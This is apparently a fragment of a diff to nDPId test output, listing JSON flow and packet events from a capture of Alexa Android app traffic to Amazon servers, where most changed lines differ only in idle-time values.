-00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":964,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071237,"flow_last_seen":1490976071324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976071324,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":965,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071349,"flow_last_seen":1490976071349,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071349,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1490976071349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071349,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lMZAAEAGsiisECrYNF7ohrJ\/Abuhu87oAAAAAKAC\/\/\/ULgAAAgQFtAQCCAoA9louAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1490976071360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071360,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwaLpAAOcGN0A0XuiGrBAq2AG7sn5peFkmyPjA43ASH\/5viQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1490976071361,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071361,"pkt":"AMDKkaPvePiC0\/vCCABFAAAomslAAEAGrDmsECrYNF7ohrJ+AbvI+MDjaXhZJ1AQAVe5+gAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071306,"flow_last_seen":1490976071362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976071362,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1490976071363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071363,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWSpAAOcGRtA0XuiGrBAq2AG7sn0V5Ch+kScxUnASH\/67KQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1490976071364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071364,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoa3pAAEAG24isECrYNF7ohrJ9AbuRJzFSFeQof1AQAVcFmwAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":971,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071286,"flow_last_seen":1490976071365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":972,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071380,"flow_last_seen":1490976071380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071380,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1490976071380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071380,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Ky9AAEAGG8CsECrYNF7ohrKAAbueQXEdAAAAAKAC\/\/81bwAAAgQFtAQCCAoA9loyAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":973,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071385,"flow_last_seen":1490976071385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071385,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1490976071385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071385,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fzdAAEAGx7esECrYNF7ohrKBAbt+UyUFAAAAAKAC\/\/+hdAAAAgQFtAQCCAoA9loyAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":962,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1490976071322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071322,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3TJAAOcGwsc0XuiGrBAq2ABQwcY3D6dGIEe1bHASH\/76HQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":963,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1490976071324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071324,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo70lAAEAGV7msECrYNF7ohsHGAFAgR7VsNw+nR1AQAVdEjwAA"} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":964,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071237,"flow_last_seen":1490976071324,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976071324,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":965,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071349,"flow_last_seen":1490976071349,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071349,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1490976071349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071349,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lMZAAEAGsiisECrYNF7ohrJ\/Abuhu87oAAAAAKAC\/\/\/ULgAAAgQFtAQCCAoA9louAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1490976071360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071360,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwaLpAAOcGN0A0XuiGrBAq2AG7sn5peFkmyPjA43ASH\/5viQAAAgQFtAEDAwY="} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1490976071361,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071361,"pkt":"AMDKkaPvePiC0\/vCCABFAAAomslAAEAGrDmsECrYNF7ohrJ+AbvI+MDjaXhZJ1AQAVe5+gAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071306,"flow_last_seen":1490976071362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976071362,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1490976071363,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071363,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWSpAAOcGRtA0XuiGrBAq2AG7sn0V5Ch+kScxUnASH\/67KQAAAgQFtAEDAwY="} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1490976071364,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071364,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoa3pAAEAG24isECrYNF7ohrJ9AbuRJzFSFeQof1AQAVcFmwAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":971,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071286,"flow_last_seen":1490976071365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":972,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071380,"flow_last_seen":1490976071380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071380,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1490976071380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071380,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Ky9AAEAGG8CsECrYNF7ohrKAAbueQXEdAAAAAKAC\/\/81bwAAAgQFtAQCCAoA9loyAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":973,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071385,"flow_last_seen":1490976071385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071385,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1490976071385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071385,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fzdAAEAGx7esECrYNF7ohrKBAbt+UyUFAAAAAKAC\/\/+hdAAAAgQFtAQCCAoA9loyAAAAAAEDAwg="} 
00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1490976071389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976071389,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl2DBAAEARtV2sECoBrBAq2AA1YfkAUYstBuuBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAADUACwhwaXRhbmd1acASwC4AAQABAAAANQAENF7ohg=="} 00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":974,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976071389,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071392,"flow_last_seen":1490976071392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1490976071392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071392,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hllAAEAGwJWsECrYNF7ohukyAbtO5dxqAAAAAKAC\/\/\/iygAAAgQFtAQCCAoA9lozAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1490976071431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071431,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwichAAOcGFjI0XuiGrBAq2AG7soCzlhpDnkFxHnASH\/7eyAAAAgQFtAEDAwY="} -01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":979,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071306,"flow_last_seen":1490976071432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976071432,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1490976071433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071433,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoKzBAAEAGG9OsECrYNF7ohrKAAbueQXEes5YaRFAQAVcpOgAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071380,"flow_last_seen":1490976071434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071434,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1490976071438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071438,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwR+BAAOcGWBo0XuiGrBAq2AG7sn8uyCJ8obvO6XASH\/76GQAAAgQFtAEDAwY="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1490976071438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071438,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwR+FAAOcGWBk0XuiGrBAq2AG7soEpho4ZflMlBnASH\/5hCAAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1490976071440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAolMdAAEAGsjusECrYNF7ohrJ\/Abuhu87pLsgifVAQAVdEiwAA"} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1490976071440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofzhAAEAGx8qsECrYNF7ohrKBAbt+UyUGKYaOGlAQAVereQAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":991,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071349,"flow_last_seen":1490976071441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 